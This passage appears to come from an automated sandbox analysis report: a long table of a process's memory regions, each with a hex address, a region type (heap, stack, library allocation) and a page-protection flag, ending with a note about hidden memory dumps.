trusted library allocation
|
page read and write
|
||
|
1C5A000
|
trusted library allocation
|
page read and write
|
||
|
4A00000
|
trusted library allocation
|
page read and write
|
||
|
3FE0000
|
trusted library allocation
|
page read and write
|
||
|
463E000
|
stack
|
page read and write
|
||
|
7FFE7D040000
|
trusted library allocation
|
page read and write
|
||
|
1593000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D150000
|
trusted library allocation
|
page execute and read and write
|
||
|
492E000
|
stack
|
page read and write
|
||
|
1565000
|
heap
|
page read and write
|
||
|
1B4A6000
|
heap
|
page read and write
|
||
|
7FFE7CFA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CC9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
49C0000
|
heap
|
page read and write
|
||
|
4B44000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D000000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D160000
|
trusted library allocation
|
page read and write
|
||
|
2530000
|
trusted library section
|
page read and write
|
||
|
7FFE7CF31000
|
trusted library allocation
|
page read and write
|
||
|
A881000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CE38000
|
trusted library allocation
|
page read and write
|
||
|
112F000
|
heap
|
page read and write
|
||
|
1E58000
|
trusted library allocation
|
page read and write
|
||
|
1BD05000
|
heap
|
page read and write
|
||
|
7FFE7CCB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CEA0000
|
trusted library allocation
|
page read and write
|
||
|
1B47000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F440000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7CEB7000
|
trusted library allocation
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
A80000
|
unkown
|
page readonly
|
||
|
5B30000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF90000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CE80000
|
trusted library allocation
|
page read and write
|
||
|
49C3000
|
heap
|
page read and write
|
||
|
8E26000
|
trusted library allocation
|
page read and write
|
||
|
66A0000
|
heap
|
page read and write
|
||
|
46E9000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CCBB000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7CE4F000
|
trusted library allocation
|
page read and write
|
||
|
4C40000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CE61000
|
trusted library allocation
|
page read and write
|
||
|
5F10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1010000
|
heap
|
page read and write
|
||
|
BEE000
|
stack
|
page read and write
|
||
|
2E50000
|
heap
|
page read and write
|
||
|
2CBE000
|
heap
|
page read and write
|
||
|
A2E000
|
heap
|
page read and write
|
||
|
1348000
|
unkown
|
page readonly
|
||
|
4C20000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DD3000
|
heap
|
page execute and read and write
|
||
|
29C0000
|
heap
|
page read and write
|
||
|
2CB2000
|
heap
|
page read and write
|
||
|
4B66000
|
trusted library allocation
|
page execute and read and write
|
||
|
5EB0000
|
trusted library allocation
|
page read and write
|
||
|
1944000
|
heap
|
page read and write
|
||
|
4700000
|
trusted library allocation
|
page read and write
|
||
|
126FE000
|
trusted library allocation
|
page read and write
|
||
|
F44000
|
unkown
|
page write copy
|
||
|
1900000
|
heap
|
page read and write
|
||
|
7FFE7D000000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF29000
|
trusted library allocation
|
page read and write
|
||
|
5EA5000
|
trusted library allocation
|
page read and write
|
||
|
6EEF000
|
stack
|
page read and write
|
||
|
4CA4000
|
trusted library allocation
|
page read and write
|
||
|
A94000
|
unkown
|
page read and write
|
||
|
7FFE7D170000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CDBA000
|
trusted library allocation
|
page execute and read and write
|
||
|
1430000
|
heap
|
page read and write
|
||
|
5CE5000
|
trusted library allocation
|
page read and write
|
||
|
5C4D000
|
stack
|
page read and write
|
||
|
825D000
|
trusted library allocation
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
196F000
|
heap
|
page read and write
|
||
|
7FFE7CD50000
|
trusted library allocation
|
page execute and read and write
|
||
|
29C5000
|
heap
|
page read and write
|
||
|
7FFE7CCA3000
|
trusted library allocation
|
page read and write
|
||
|
5C90000
|
trusted library section
|
page read and write
|
||
|
4A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
46F0000
|
trusted library allocation
|
page read and write
|
||
|
1B45000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B478000
|
heap
|
page read and write
|
||
|
FA0000
|
trusted library allocation
|
page read and write
|
||
|
26C2000
|
unkown
|
page readonly
|
||
|
7FFE7CF00000
|
trusted library allocation
|
page read and write
|
||
|
F3D000
|
unkown
|
page readonly
|
||
|
5EC0000
|
trusted library allocation
|
page read and write
|
||
|
26C0000
|
unkown
|
page readonly
|
||
|
7FFE7CED9000
|
trusted library allocation
|
page read and write
|
||
|
5B20000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CEE0000
|
trusted library allocation
|
page read and write
|
||
|
5B3B000
|
trusted library allocation
|
page read and write
|
||
|
740E000
|
stack
|
page read and write
|
||
|
F3D000
|
unkown
|
page readonly
|
||
|
FCD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7D030000
|
trusted library allocation
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
7FFE7D010000
|
trusted library allocation
|
page read and write
|
||
|
7060000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CE40000
|
trusted library allocation
|
page read and write
|
||
|
4750000
|
trusted library allocation
|
page read and write
|
||
|
4200000
|
heap
|
page read and write
|
||
|
3F80000
|
trusted library allocation
|
page read and write
|
||
|
190E000
|
heap
|
page read and write
|
||
|
7FFE7CC9D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CD0000
|
heap
|
page execute and read and write
|
||
|
851D000
|
trusted library allocation
|
page read and write
|
||
|
4CC0000
|
trusted library allocation
|
page read and write
|
||
|
F46000
|
unkown
|
page readonly
|
||
|
1BA43000
|
heap
|
page execute and read and write
|
||
|
5DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7CDCB000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7CF35000
|
trusted library allocation
|
page read and write
|
||
|
4070000
|
trusted library allocation
|
page read and write
|
||
|
34C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CB3000
|
heap
|
page read and write
|
||
|
5FA4000
|
trusted library section
|
page read and write
|
||
|
7055000
|
trusted library allocation
|
page read and write
|
||
|
3FD5000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D017000
|
trusted library allocation
|
page read and write
|
||
|
1B2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B3D000
|
heap
|
page read and write
|
||
|
1B49C000
|
heap
|
page read and write
|
||
|
1B190000
|
heap
|
page read and write
|
||
|
1BA40000
|
heap
|
page execute and read and write
|
||
|
5B2A000
|
trusted library allocation
|
page read and write
|
||
|
4BBE000
|
stack
|
page read and write
|
||
|
7FFE7CE45000
|
trusted library allocation
|
page read and write
|
||
|
42DE000
|
stack
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
7FFE7D070000
|
trusted library allocation
|
page read and write
|
||
|
4CE1000
|
trusted library allocation
|
page read and write
|
||
|
A40000
|
trusted library allocation
|
page read and write
|
||
|
1291000
|
heap
|
page read and write
|
||
|
46B0000
|
heap
|
page read and write
|
||
|
7FFE7CDB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
50CD000
|
stack
|
page read and write
|
||
|
562C000
|
stack
|
page read and write
|
||
|
5A10000
|
heap
|
page read and write
|
||
|
4B69000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7CF8C000
|
trusted library allocation
|
page read and write
|
||
|
1B39E000
|
stack
|
page read and write
|
||
|
126F1000
|
trusted library allocation
|
page read and write
|
||
|
5D9A000
|
stack
|
page read and write
|
||
|
664D000
|
stack
|
page read and write
|
||
|
67BE000
|
stack
|
page read and write
|
||
|
12B9000
|
heap
|
page read and write
|
||
|
1B4B000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B180000
|
trusted library allocation
|
page read and write
|
||
|
1AFE000
|
stack
|
page read and write
|
||
|
1BCA7000
|
heap
|
page read and write
|
||
|
2BBE000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CE40000
|
trusted library allocation
|
page read and write
|
||
|
3510000
|
heap
|
page read and write
|
||
|
41A0000
|
heap
|
page read and write
|
||
|
7FFE7CE43000
|
trusted library allocation
|
page read and write
|
||
|
466E000
|
stack
|
page read and write
|
||
|
590E000
|
stack
|
page read and write
|
||
|
5EF0000
|
heap
|
page read and write
|
||
|
FBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BC92000
|
heap
|
page read and write
|
||
|
7FFE7CECB000
|
trusted library allocation
|
page read and write
|
||
|
7060000
|
trusted library allocation
|
page read and write
|
||
|
7F458000
|
trusted library allocation
|
page execute and read and write
|
||
|
A8F000
|
heap
|
page read and write
|
||
|
7FFE7CF21000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CEC0000
|
trusted library allocation
|
page read and write
|
||
|
5F30000
|
trusted library allocation
|
page read and write
|
||
|
6156000
|
trusted library section
|
page read and write
|
||
|
542A000
|
stack
|
page read and write
|
||
|
1C0B3000
|
heap
|
page read and write
|
||
|
2AA1000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CE47000
|
trusted library allocation
|
page read and write
|
||
|
26D4000
|
unkown
|
page readonly
|
||
|
4CA0000
|
trusted library allocation
|
page read and write
|
||
|
497E000
|
stack
|
page read and write
|
||
|
15D0000
|
heap
|
page read and write
|
||
|
3F90000
|
trusted library allocation
|
page read and write
|
||
|
1B430000
|
heap
|
page read and write
|
||
|
49B0000
|
heap
|
page read and write
|
||
|
7FFE7CD4C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CB8000
|
heap
|
page read and write
|
||
|
146F000
|
unkown
|
page readonly
|
||
|
4CC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CC93000
|
trusted library allocation
|
page execute and read and write
|
||
|
1277000
|
heap
|
page read and write
|
||
|
660E000
|
stack
|
page read and write
|
||
|
4000000
|
heap
|
page execute and read and write
|
||
|
7FFE7CE85000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CE7F000
|
trusted library allocation
|
page read and write
|
||
|
1C0C9000
|
heap
|
page read and write
|
||
|
48B0000
|
trusted library allocation
|
page read and write
|
||
|
72CE000
|
stack
|
page read and write
|
||
|
7FFE7CE90000
|
trusted library allocation
|
page read and write
|
||
|
AAD000
|
heap
|
page read and write
|
||
|
750F000
|
stack
|
page read and write
|
||
|
7FFE7CED5000
|
trusted library allocation
|
page read and write
|
||
|
2988000
|
stack
|
page read and write
|
||
|
4C30000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF8E000
|
trusted library allocation
|
page read and write
|
||
|
CD2000
|
unkown
|
page readonly
|
||
|
126FC000
|
trusted library allocation
|
page read and write
|
||
|
1020000
|
heap
|
page read and write
|
||
|
7060000
|
trusted library allocation
|
page read and write
|
||
|
4B40000
|
trusted library allocation
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
470D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CCB000
|
heap
|
page read and write
|
||
|
7FFE7CE71000
|
trusted library allocation
|
page read and write
|
||
|
1B40000
|
trusted library allocation
|
page read and write
|
||
|
1C4C6000
|
stack
|
page read and write
|
||
|
3FA6000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D090000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CE52000
|
trusted library allocation
|
page read and write
|
||
|
508D000
|
stack
|
page read and write
|
||
|
7FFE7D090000
|
trusted library allocation
|
page read and write
|
||
|
A81000
|
unkown
|
page execute read
|
||
|
1B5E2000
|
unkown
|
page readonly
|
||
|
754C000
|
stack
|
page read and write
|
||
|
12FFC000
|
trusted library allocation
|
page read and write
|
||
|
2CB8000
|
heap
|
page read and write
|
||
|
7FFE7CE9D000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CEF0000
|
trusted library allocation
|
page read and write
|
||
|
5E76000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF23000
|
trusted library allocation
|
page read and write
|
||
|
13E7000
|
heap
|
page read and write
|
||
|
566E000
|
stack
|
page read and write
|
||
|
AD5000
|
heap
|
page read and write
|
||
|
1C0C6000
|
heap
|
page read and write
|
||
|
7FFE7CED0000
|
trusted library allocation
|
page read and write
|
||
|
2EA0000
|
trusted library allocation
|
page read and write
|
||
|
F31000
|
unkown
|
page execute read
|
||
|
1B48C000
|
heap
|
page read and write
|
||
|
7FFE7CCBB000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7CF30000
|
trusted library allocation
|
page read and write
|
||
|
127B000
|
heap
|
page read and write
|
||
|
4CB0000
|
trusted library allocation
|
page read and write
|
||
|
1B00000
|
trusted library allocation
|
page read and write
|
||
|
4C9C000
|
trusted library allocation
|
page read and write
|
||
|
1B0E0000
|
heap
|
page execute and read and write
|
There are 711 hidden memdumps, click here to show them.